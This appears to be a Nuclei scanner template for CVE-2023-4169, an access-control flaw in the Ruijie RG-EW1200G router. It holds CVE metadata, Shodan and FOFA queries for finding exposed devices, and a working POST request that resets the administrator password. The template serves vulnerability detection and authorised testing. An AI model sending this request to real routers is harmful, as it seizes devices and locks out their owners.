Ruijie RG-EW1200G Router - Password Reset

id: CVE-2023-4169

info:
  name: Ruijie RG-EW1200G Router - Password Reset
  author: DhiyaneshDK
  severity: high
  description: |
    A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4169
    - https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G
    - https://vuldb.com/?ctiid.236185
    - https://vuldb.com/?id.236185
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-4169
    cwe-id: CWE-284,NVD-CWE-noinfo
    epss-score: 0.0131
    epss-percentile: 0.85907
    cpe: cpe:2.3:o:ruijie:rg-ew1200g_firmware:1.0\(1\)b1p5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ruijie
    product: rg-ew1200g_firmware
    shodan-query: http.html:"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
    fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css"
  tags: cve,cve2023,ruijie,router,intrusive
variables:
  password: "{{rand_base(8)}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/sys/set_passwd"

    body: |
      {
      "username":"web",
      "admin_new":"{{password}}"
      }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result":"ok"'

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a004730450220368b98f36f09a638be30332a8c9e763dc3dc9c8ecf4fdb4d48262bfb0ee79d58022100dccc7a915cb6d0eb0970460c74652810244da8e1ffeaca8ef9f4cd1871990bbe:922c64590222798bb761d5b6d8e72950